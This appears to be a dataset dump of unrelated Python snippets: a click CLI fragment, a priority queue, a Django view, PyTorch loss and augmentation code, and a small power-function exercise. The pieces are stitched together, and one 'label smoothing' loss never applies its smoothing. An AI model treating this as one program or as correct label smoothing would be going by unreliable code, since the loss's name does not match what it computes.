def make_lowercase():
    """Return a processor that lower-cases every line."""
    def processor(iterator):
        return (line.lower() for line in iterator)
    return processor
@cli.command('strip')
def make_strip():
    """Return a processor that strips surrounding whitespace from lines."""
    def processor(iterator):
        return (line.strip() for line in iterator)
    return processor
if __name__ == '__main__':
    # Run the click pipeline group when executed as a script.
    cli()
|
class Node:
    """A value/priority pair stored in the priority queue."""

    def __init__(self, value, priority):
        self.value = value
        self.priority = priority

    def get_priority(self):
        return self.priority

    def get_value(self):
        return self.value


# we will be using min heap for this
class PriorityQueue:
    """Binary min-heap priority queue of Node objects.

    Lower priority values dequeue first.
    """

    def __init__(self):
        self.values = []

    def enqueue(self, value, priority):
        """Add *value* with *priority* to the queue."""
        new_node = Node(value, priority)
        self.insert(new_node)

    def insert(self, node):
        """Append *node* and sift it up to restore the heap property."""
        self.values.append(node)
        index = len(self.values) - 1
        # Fix: bound-check the parent BEFORE comparing; the old loop computed
        # parent_index = -1 at the root and compared against values[-1]
        # (the last element) before its guard kicked in.
        while index > 0:
            parent_index = (index - 1) // 2
            if self.values[index].get_priority() >= self.values[parent_index].get_priority():
                break
            self.values[parent_index], self.values[index] = self.values[index], self.values[parent_index]
            index = parent_index

    def dequeue(self):
        return self.extract_min()

    def extract_min(self):
        """Remove and return the Node with the smallest priority (None if empty)."""
        if not self.values:
            return None
        if len(self.values) == 1:
            return self.values.pop()
        length = len(self.values) - 1
        # Move the last element to the root, pop the minimum, then sift down.
        self.values[0], self.values[length] = self.values[length], self.values[0]
        return_node = self.values.pop()
        # Fix: the old sift-down returned early whenever only a left child
        # existed (right_child >= length), which left the heap property
        # violated for even-sized heaps (e.g. priorities 1,2,3 dequeued 1, 3, 2).
        index = 0
        while True:
            left = 2 * index + 1
            right = 2 * index + 2
            smallest = index
            if left < length and self.values[left].get_priority() < self.values[smallest].get_priority():
                smallest = left
            if right < length and self.values[right].get_priority() < self.values[smallest].get_priority():
                smallest = right
            if smallest == index:
                return return_node
            self.values[index], self.values[smallest] = self.values[smallest], self.values[index]
            index = smallest

    def returnQueue(self):
        """Return the heap as a list of {priority: value} dicts in heap order."""
        return [{node.get_priority(): node.get_value()} for node in self.values]
|
from django.shortcuts import render
from hello_django_app.models import Recipe, Ingredient
# Create your views here.
def index(request):
    """Render the recipe index, optionally pre-selecting ingredients.

    Reads repeated `ingredient[]` GET parameters as ingredient ids.
    """
    selected = list(map(int, request.GET.getlist('ingredient[]', [])))
    ingredients_list = Ingredient.objects.order_by('title')
    # Fix: dropped the stray trailing line-continuation backslash, which
    # spliced the commented-out .filter() lines into this statement.
    recipes_list = Recipe.objects.order_by('title')
    # To filter by the selected ingredients, re-enable:
    #   .filter(proportions__in=selected).distinct()
    context = {
        'selected_ingredients': selected,
        'ingredients_list': ingredients_list,
        'recipes_list': recipes_list,
    }
    return render(request, 'index.html', context)
|
import os
import re
import random
import math
import torch
import torch.nn as nn
import numpy as np
import cv2
INTER_MODE = {'NEAREST': cv2.INTER_NEAREST, 'BILINEAR': cv2.INTER_LINEAR, 'BICUBIC': cv2.INTER_CUBIC}
class CrossEntropyLabelSmooth(nn.Module):
    """Focal-style loss with label-smoothing machinery.

    Args:
        num_classes (int): number of target classes.
        epsilon (float): label-smoothing factor.
        gamma (float): focal down-weighting exponent applied as (1 - p)**gamma.
        weight (Tensor, optional): per-class weights broadcast over the batch.
    """

    def __init__(self, num_classes, epsilon, gamma, weight=None):
        super(CrossEntropyLabelSmooth, self).__init__()
        self.num_classes = num_classes
        self.epsilon = epsilon
        self.softmax = nn.Softmax(dim=1)
        self.gamma = gamma
        self.weight = weight

    def forward(self, inputs, targets):
        probs = self.softmax(inputs)
        log_probs = torch.log(probs)
        # One-hot encode, then smooth the target distribution.
        targets = torch.zeros_like(log_probs).scatter_(1, targets.unsqueeze(1), 1)
        targets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes
        # NOTE(review): the smoothed `targets` are computed but NOT used below
        # (see the commented-out line) -- the loss sums over ALL classes.
        # Preserved as-is; confirm intent.
        # loss = (-targets * log_probs).mean(0).sum()
        if self.weight is None:  # fix: `is None`, not `== None` (elementwise on tensors)
            # mean(0): average over the batch, then sum over classes.
            loss = (-(torch.pow((1 - probs), self.gamma)) * log_probs).mean(0).sum()
        else:
            weight = self.weight.expand(inputs.shape)
            loss = (-weight * (torch.pow((1 - probs), self.gamma)) * log_probs).mean(0).sum()
        return loss
class CenterLoss(nn.Module):
    """Center loss.

    Reference:
    Wen et al. A Discriminative Feature Learning Approach for Deep Face Recognition. ECCV 2016.

    Args:
        num_classes (int): number of classes.
        feat_dim (int): feature dimension.
        use_gpu (bool): keep the learnable class centers on CUDA.
    """

    def __init__(self, num_classes=10, feat_dim=2, use_gpu=True):
        super(CenterLoss, self).__init__()
        self.num_classes = num_classes
        self.feat_dim = feat_dim
        self.use_gpu = use_gpu
        if self.use_gpu:
            self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim).cuda())
        else:
            self.centers = nn.Parameter(torch.randn(self.num_classes, self.feat_dim))

    def forward(self, x, labels):
        """
        Args:
            x: feature matrix with shape (batch_size, feat_dim).
            labels: ground truth labels with shape (batch_size).
        """
        batch_size = x.size(0)
        # Squared Euclidean distance: ||x||^2 + ||c||^2 - 2 * x . c
        distmat = torch.pow(x, 2).sum(dim=1, keepdim=True).expand(batch_size, self.num_classes) + \
                  torch.pow(self.centers, 2).sum(dim=1, keepdim=True).expand(self.num_classes, batch_size).t()
        # Fix: the positional addmm_(beta, alpha, m1, m2) form is deprecated
        # and removed in recent PyTorch; use the keyword form instead.
        distmat.addmm_(x, self.centers.t(), beta=1, alpha=-2)
        classes = torch.arange(self.num_classes).long()
        if self.use_gpu: classes = classes.cuda()
        labels = labels.unsqueeze(1).expand(batch_size, self.num_classes)
        # Keep only each sample's distance to its own class center.
        mask = labels.eq(classes.expand(batch_size, self.num_classes))
        dist = distmat * mask.float()
        # Clamp guards against tiny negative values from floating-point error.
        loss = dist.clamp(min=1e-12, max=1e+12).sum() / batch_size
        return loss
def mixup_data(x, y, alpha=0.2, use_cuda=True):
    '''Returns mixed inputs, pairs of targets, and lambda'''
    # Mixing coefficient drawn from Beta(alpha, alpha); alpha <= 0 disables mixing.
    lam = np.random.beta(alpha, alpha) if alpha > 0 else 1
    batch_size = x.size()[0]
    perm = torch.randperm(batch_size)
    if use_cuda:
        perm = perm.cuda()
    # Blend each sample with a randomly permuted partner.
    mixed_x = lam * x + (1 - lam) * x[perm, :]
    return mixed_x, y, y[perm], lam
def mixup_criterion(criterion, pred, y_a, y_b, lam):
    """Mixup loss: convex combination of the losses against both targets."""
    loss_a = criterion(pred, y_a)
    loss_b = criterion(pred, y_b)
    return lam * loss_a + (1 - lam) * loss_b
class RandomErasing:
    """Randomly erase a rectangular region of an image.

    Implements Random Erasing Data Augmentation (Zhong et al.).

    Args:
        p: probability of performing random erasing.
        sl: min erasing area fraction.
        sh: max erasing area fraction.
        r1: min aspect ratio of the erased region (max is 1/r1).
    """

    def __init__(self, p=0.5, sl=0.02, sh=0.4, r1=0.3):
        self.p = p
        self.s = (sl, sh)       # (min, max) area fraction
        self.r = (r1, 1/r1)     # (min, max) aspect ratio

    def __call__(self, img):
        """Erase one random rectangle in *img* (in place) with probability p.

        Args:
            img: numpy array of shape [h, w, c], values in [0, 255].
        Returns:
            The (possibly modified) image.
        """
        assert len(img.shape) == 3, 'image should be a 3 dimension numpy array'
        if random.random() > self.p:
            return img
        else:
            # Retry until the sampled rectangle fits inside the image.
            while True:
                Se = random.uniform(*self.s) * img.shape[0] * img.shape[1]  # target area
                re = random.uniform(*self.r)                                # aspect ratio
                He = int(round(math.sqrt(Se * re)))   # erase-region height
                We = int(round(math.sqrt(Se / re)))   # erase-region width
                # NOTE(review): randint's upper bound is inclusive, so xe/ye can
                # equal the image size; the fit check below rejects those draws.
                xe = random.randint(0, img.shape[1])
                ye = random.randint(0, img.shape[0])
                if xe + We <= img.shape[1] and ye + He <= img.shape[0]:
                    # Fill the region with uniform random noise per channel.
                    img[ye : ye + He, xe : xe + We, :] = np.random.randint(low=0, high=255, size=(He, We, img.shape[2]))
                    return img
if __name__ == "__main__":
    # Visual smoke test: show 20 randomly-erased variants of test.jpg.
    # NOTE(review): if test.jpg is missing, cv2.imread returns None and the
    # shape assert inside RandomErasing fires.
    img = cv2.imread("test.jpg")
    RE = RandomErasing(p=0.5)
    for i in range(20):
        img1 = RE(img.copy())   # copy so each variant starts from the original
        cv2.imshow("test", img1)
        cv2.waitKey(1000)
|
# Define a function `to_power(num, *args)`:
#   input: num, plus numbers passed as varargs (e.g. nums = [1, 2, 3])
#   output: list of each number raised to `num` (e.g. to_power(3, *nums) -> [1, 8, 27])
#   if the user passed no args, return a message instead of a list
#   NOTE: implemented with a list comprehension
# Gather the exponent and the upper bound interactively (Spanish prompts).
num=int(input("Ingrese el exponente: "))
numeros=int(input("Ingrese hasta que numero va a calcular las potencias: "))
# Bases 1..numeros inclusive.
lista=[i for i in range(1,numeros+1)]
def to_power(num, *lista):
    """Raise each extra positional argument to the power *num*.

    Returns the list of powers, or a message string when no args were given.
    """
    if not lista:
        return "Hey didn't pass args"
    return [base ** num for base in lista]
print(to_power(num,*lista))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.